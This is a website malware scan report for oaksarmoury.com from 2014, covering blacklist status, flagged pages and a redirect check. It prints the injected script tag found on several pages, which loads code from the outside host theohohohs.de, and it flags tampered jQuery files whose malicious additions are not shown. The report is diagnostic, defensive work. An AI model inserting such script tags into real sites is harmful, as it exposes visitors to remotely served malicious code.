Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oaksarmoury.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oaksarmoury.com/
Result: The website is marked by Yandex as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://oaksarmoury.com/ | 200 OK Content-Length: 7798 Content-Type: text/html | suspicious |
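Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135162" type="text/javascript"></script> (this tag loads a script from a third-party host rather than from the site itself; the same host and path, with varying id values, are reported on the other HTML pages listed below, so every page of the site should be checked and restored, not only this one) | ||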
http://c2.gostats.com/js/count4.js?id=509573 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 16:40:09 GMT Location: http://gostats.com/js/count4.js?id=509573 Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://gostats.com/js/count4.js?id=509573 | 200 OK Content-Length: 519 Content-Type: application/x-javascript | clean |
http://oaksarmoury.com/index.html | 200 OK Content-Length: 7798 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135162" type="text/javascript"></script> | ||
http://oaksarmoury.com/about.html | 200 OK Content-Length: 11748 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135157" type="text/javascript"></script> | ||
http://oaksarmoury.com/gallery.html | 200 OK Content-Length: 20695 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135160" type="text/javascript"></script> | ||
http://oaksarmoury.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 62037 Content-Type: application/javascript | malicious |
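Malicious code - confirmed by antiviruses (see below). Excerpt: (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document /*/a9a007*/ (The excerpt is truncated. The library code shown appears to match the opening of the stock jQuery 1.3.2 file; the /*/a9a007*/ comment is not part of the upstream library and presumably marks where code was appended to the file. The appended code itself is not shown here, so comparing the served file against a known-good copy of the library is the reliable way to confirm the modification.) Antivirus reports: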
| ||
http://oaksarmoury.com/js/jquery-ui-1.7.2.custom.min.js | 200 OK Content-Length: 21722 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (truncated): jQuery.ui||(function(c){var i=c.fn.remove,d=c.browser.mozilla&&(parseFloat(c.browser.version)<1.9);c.ui={version:"1.7.2",plugin:{add:function(k,l,n){var m=c.ui[k].prototype;for(var j in n){m.plugins[j]=m.plugins[j]||[];m.plugins[j].push([l,n[j]])}},call:function(j,l,k){var n=j.plugins[l];if(!n||!j.element[0].parentNode){return}for(var m=0;m<n.length;m++){if(j.options[n[m][0]]){n[m][1].apply(j.element,k)}}}},contains:function(k,j){return document.compareDocumentPosition?k.compareDoc Antivirus reports:
| ||
http://oaksarmoury.com/js/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 14717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.lightBox=function(settings){settings=jQuery.extend({overlayBgColor:'#000',overlayOpacity:0.8,fixedNavigation:false,imageLoading:'images/lightbox-ico-loading.gif',imageBtnPrev:'images/lightbox-btn-prev.gif',imageBtnNext:'images/lightbox-btn-next.gif',imageBtnClose:'images/lightbox-btn-close.gif',imageBlank:'images/lightbox-blank.gif',containerBorderSize:10,containerResizeSpeed:400,txtImage:'Image',txtOf:'of',keyToClose:'c',keyToPrev:'p',keyToNext:'n',imageArray:[],activeImage:0} Antivirus reports:
| ||
http://oaksarmoury.com/contact.html | 200 OK Content-Length: 10874 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135159" type="text/javascript"></script> | ||
http://oaksarmoury.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 01 Jul 2014 16:40:22 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://oaksarmoury.com/../js/selectBox/jquery.selectBox.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://oaksarmoury.com/../js/jquery.watermark.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://oaksarmoury.com/../js/fancybox/jquery.fancybox.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://oaksarmoury.com/../js/fancybox/helpers/jquery.fancybox-media.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oaksarmoury.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Jul 2014 16:40:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 7798
Content-Type: text/html
Last-Modified: Sun, 24 Nov 2013 22:23:01 GMT
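...7798 bytes of data. (The length matches the 7798-byte index page that the scan above flags as suspicious, so this response is the page carrying the reported script tag. The Last-Modified value, 24 Nov 2013, is worth comparing with server logs and known-good backups when establishing when the page was changed, although a file timestamp can be altered and is not proof on its own.)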
GET / HTTP/1.1
Host: oaksarmoury.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Jul 2014 16:40:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 7798
Content-Type: text/html
Last-Modified: Sun, 24 Nov 2013 22:23:01 GMT
...7798 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: oaksarmoury.com
Referer: http://www.google.com/search?q=oaksarmoury.com
Result:
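The result matches the first query; no suspicious redirects were found. The two requests differ only in the Referer header, so a redirect that depends on some other condition (for example the User-Agent, a cookie, or the visitor's IP address) would not show up in this comparison.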
GET / HTTP/1.1
Host: oaksarmoury.com
Referer: http://www.google.com/search?q=oaksarmoury.com
Result:
The result is similar to the first query. There are no suspicious redirects found.